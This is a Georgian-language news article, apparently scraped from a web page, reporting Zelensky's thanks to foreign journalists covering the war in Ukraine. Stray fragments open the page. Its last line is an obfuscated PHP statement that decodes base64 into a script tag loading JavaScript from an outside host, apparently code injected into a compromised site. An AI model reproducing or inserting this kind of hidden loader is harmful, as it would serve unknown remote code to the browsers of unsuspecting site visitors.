tube
ავერსი jaluzi
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ მთელს ჟურნალისტურ საზოგადოებას, უკრაინაში რუსეთის სრულმასშტაბიანი შეჭრის პირველივე დღეებიდან, განვითარებული მოვლენების ობიექტურად გაშუქებისთვისა და მსოფლიოსთვის ჭეშმარიტი ინფორმაციის გადაცემისთვის მადლობა გადაუხადა.
 
ამის შესახებ ზელენსკიმ ინდონეზიის საგარეო პოლიტიკის თანამეგობრობის ანალიტიკურ ცენტრთან ონლაინ შეხვედრისას განაცხადა.
 
ზელენსკიმ აღნიშნა, რომ მასზე შთაბეჭდილება იმ ფაქტმა მოახდინა, რომ ომის პირველივე დღეებიდან ცარიელ კიევში მუდმივად, მედიის 6 000 წარმომადგენელი მუშაობდა სხვადასხვა ქვეყნიდან.
 
"მინდა, რომ ჩემი ხმა მთელმა მსოფლიომ გაიგოს. ჟურნალისტების წყალობით შევძელით მსოფლიოს გაერთიანება და ჩვენი სახელმწიფოს ფარგლებში გავერთიანდით.
 
ასეთი რამ არასოდეს მინახავს: ცარიელი ქალაქი, წასული მშვიდობიანი მოსახლეობა, სამხედროები იბრძოდნენ და ყველგან ჟურნალისტები იყვნენ. მათ შესანიშნავი საქმე გააკეთეს", - აღნიშნა ზელენსკიმ.
 
ამასთან, უკრაინის პირველმა პირმა ხაზგასმით აღნიშნა, რომ ომი არ დასრულებულა, ზოგიერთ რაიონში საომარი მოქმედებების აქტიური ეტაპი მიმდინარეობს და ზოგიერთ ადგილას ყველაფერი ახლა იწყება. აქედან გამომდინარე, ზელენსკიმ ჟურნალისტებს მოუწოდა, უკრაინაში მიმდინარე მოვლენების გასაშუქებლად მუშაობა გააგრძელონ, რადგან სწორედ ეს აახლოებს უკრაინის გამარჯვებას.
 
"მინდა გთხოვოთ, რომ არ დაგვტოვოთ, რადგან თქვენ ხართ ხიდი უკრაინასა და სხვა ქვეყნებს შორის. ეს არის ის, რის გარეშეც ვერ ვიცხოვრებთ. ეს შესანიშნავი სამუშაოა და მთელი ჟურნალისტური საზოგადოების მადლიერი ვარ", - განაცხადა ზელენსკიმ.
 
660
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");